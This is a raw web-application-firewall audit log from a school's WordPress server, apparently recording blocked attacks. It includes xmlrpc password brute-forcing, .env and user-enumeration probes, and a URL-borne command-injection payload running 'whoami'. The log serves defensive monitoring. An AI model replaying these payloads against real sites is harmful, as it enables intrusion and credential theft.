Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd64a25d-Z-- --266bc07b-A-- [24/Apr/2025:20:51:32 +0700] aApB5MlQo524fhbIj1z96AAAAAw 103.236.140.4 45858 103.236.140.4 8181 --266bc07b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.71 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --266bc07b-C-- demo.sayHello --266bc07b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --266bc07b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745502692865262 8099 (- - -) Stopwatch2: 1745502692865262 8099; combined=6351, p1=722, p2=5309, p3=59, p4=78, p5=110, sr=68, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --266bc07b-Z-- --857be613-A-- [24/Apr/2025:21:45:31 +0700] aApOi_iVYlyO1xhz7yNjrAAAANg 103.236.140.4 45712 103.236.140.4 8181 --857be613-B-- GET /?n=%0A&cmd=whoami&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.93.252.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.93.252.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --857be613-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --857be613-E-- --857be613-H-- Message: Access denied with code 403 (phase 2). Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "82"] [id "210381"] [rev "6"] [msg "COMODO WAF: URL Encoding Abuse Attack Attempt||103.236.140.4|F|4"] [data "REQUEST_URI=/?n=%0A&cmd=whoami&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745505931039884 2938 (- - -) Stopwatch2: 1745505931039884 2938; combined=1774, p1=418, p2=1310, p3=0, p4=0, p5=46, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --857be613-Z-- --a393ce16-A-- [24/Apr/2025:22:06:25 +0700] aApTcfiVYlyO1xhz7yNvMAAAAMU 103.236.140.4 39620 103.236.140.4 8181 --a393ce16-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a393ce16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a393ce16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745507185620879 2464 (- - -) Stopwatch2: 1745507185620879 2464; combined=1105, p1=396, p2=684, p3=0, p4=0, p5=24, sr=60, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a393ce16-Z-- --5027364c-A-- [24/Apr/2025:22:06:31 +0700] aApTd_iVYlyO1xhz7yNvNwAAAMw 103.236.140.4 39772 103.236.140.4 8181 --5027364c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.10 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5027364c-C-- demo.sayHello --5027364c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5027364c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745507191689586 6991 (- - -) Stopwatch2: 1745507191689586 6991; combined=4909, p1=628, p2=3996, p3=38, p4=44, p5=117, sr=77, sw=86, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5027364c-Z-- --b97ea92c-A-- [24/Apr/2025:22:26:03 +0700] aApYC2Luk3f9kLjsdTZNawAAAIY 103.236.140.4 40720 103.236.140.4 8181 --b97ea92c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b97ea92c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b97ea92c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745508363758466 2694 (- - -) Stopwatch2: 1745508363758466 2694; combined=1229, p1=410, p2=789, p3=0, p4=0, p5=29, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b97ea92c-Z-- --587a8f00-A-- [24/Apr/2025:22:26:11 +0700] aApYE8lQo524fhbIj1xHfwAAAA4 103.236.140.4 40912 103.236.140.4 8181 --587a8f00-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.119 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --587a8f00-C-- demo.sayHello --587a8f00-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --587a8f00-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745508371216146 7907 (- - -) Stopwatch2: 1745508371216146 7907; combined=6005, p1=755, p2=4990, p3=46, p4=61, p5=91, sr=77, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --587a8f00-Z-- --11247228-A-- [24/Apr/2025:22:32:10 +0700] aApZeslQo524fhbIj1xJ_wAAAAA 103.236.140.4 49634 103.236.140.4 8181 --11247228-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.128.207.219 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.128.207.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --11247228-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11247228-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745508730833096 650 (- - -) Stopwatch2: 1745508730833096 650; combined=293, p1=263, p2=0, p3=0, p4=0, p5=30, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11247228-Z-- --97f4ed32-A-- [24/Apr/2025:22:40:00 +0700] aApbUGLuk3f9kLjsdTZUBQAAAIY 103.236.140.4 60846 103.236.140.4 8181 --97f4ed32-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 139.59.136.184 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 139.59.136.184 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --97f4ed32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97f4ed32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745509200913842 813 (- - -) Stopwatch2: 1745509200913842 813; combined=315, p1=275, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97f4ed32-Z-- --69f14c7b-A-- [24/Apr/2025:22:48:45 +0700] aApdXfiVYlyO1xhz7yN-AAAAAM0 103.236.140.4 45136 103.236.140.4 8181 --69f14c7b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --69f14c7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69f14c7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745509725000142 2900 (- - -) Stopwatch2: 1745509725000142 2900; combined=1379, p1=440, p2=907, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69f14c7b-Z-- --dc4fc311-A-- [24/Apr/2025:22:48:52 +0700] aApdZGLuk3f9kLjsdTZWKAAAAIs 103.236.140.4 45316 103.236.140.4 8181 --dc4fc311-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.184 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc4fc311-C-- demo.sayHello --dc4fc311-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc4fc311-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745509732375282 5439 (- - -) Stopwatch2: 1745509732375282 5439; combined=4264, p1=512, p2=3509, p3=41, p4=36, p5=97, sr=72, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc4fc311-Z-- --17033e26-A-- [24/Apr/2025:23:00:22 +0700] aApgFt5yz20UX9VrdZObsgAAAFE 103.236.140.4 35776 103.236.140.4 8181 --17033e26-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2 Accept-Charset: utf-8 --17033e26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17033e26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745510422928390 782 (- - -) Stopwatch2: 1745510422928390 782; combined=291, p1=249, p2=0, p3=0, p4=0, p5=42, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17033e26-Z-- --d5a90020-A-- [24/Apr/2025:23:20:52 +0700] aApk5GLuk3f9kLjsdTZjiAAAAIE 103.236.140.4 56406 103.236.140.4 8181 --d5a90020-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d5a90020-C-- wp.getUsersBlogs admin 123456789 --d5a90020-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5a90020-E-- --d5a90020-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745511652961605 4949 (- - -) Stopwatch2: 1745511652961605 4949; combined=3405, p1=404, p2=2818, p3=0, p4=0, p5=104, sr=74, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5a90020-Z-- --0e3bb613-A-- [24/Apr/2025:23:21:57 +0700] aAplJfiVYlyO1xhz7yORbQAAANU 103.236.140.4 60564 103.236.140.4 8181 --0e3bb613-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0e3bb613-C-- wp.getUsersBlogs admin admin1981 --0e3bb613-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e3bb613-E-- --0e3bb613-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745511717977936 5222 (- - -) Stopwatch2: 1745511717977936 5222; combined=4013, p1=560, p2=3242, p3=0, p4=0, p5=121, sr=203, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e3bb613-Z-- --9a5b5f03-A-- [24/Apr/2025:23:22:57 +0700] aAplYWLuk3f9kLjsdTZlbgAAAIk 103.236.140.4 36136 103.236.140.4 8181 --9a5b5f03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9a5b5f03-C-- wp.getUsersBlogs admin Marketing2012 --9a5b5f03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a5b5f03-E-- --9a5b5f03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (88+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745511777313223 4903 (- - -) Stopwatch2: 1745511777313223 4903; combined=3338, p1=396, p2=2779, p3=0, p4=0, p5=94, sr=81, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a5b5f03-Z-- --d6e70608-A-- [24/Apr/2025:23:23:57 +0700] aAplnd5yz20UX9VrdZOrbAAAAFI 103.236.140.4 40188 103.236.140.4 8181 --d6e70608-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d6e70608-C-- wp.getUsersBlogs admin smkn22-jkt.sch000 --d6e70608-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6e70608-E-- --d6e70608-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (122+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745511837195333 5006 (- - -) Stopwatch2: 1745511837195333 5006; combined=3512, p1=414, p2=2929, p3=0, p4=0, p5=98, sr=85, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6e70608-Z-- --48f6d934-A-- [24/Apr/2025:23:24:57 +0700] aApl2clQo524fhbIj1xoMAAAABA 103.236.140.4 43822 103.236.140.4 8181 --48f6d934-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --48f6d934-C-- wp.getUsersBlogs admin Adminadmin --48f6d934-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48f6d934-E-- --48f6d934-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745511897621672 4715 (- - -) Stopwatch2: 1745511897621672 4715; combined=3246, p1=399, p2=2692, p3=0, p4=0, p5=90, sr=81, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48f6d934-Z-- --a14fd039-A-- [24/Apr/2025:23:25:57 +0700] aApmFclQo524fhbIj1xo9gAAABU 103.236.140.4 47668 103.236.140.4 8181 --a14fd039-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a14fd039-C-- wp.getUsersBlogs admin zaq1xsw2 --a14fd039-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a14fd039-E-- --a14fd039-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] 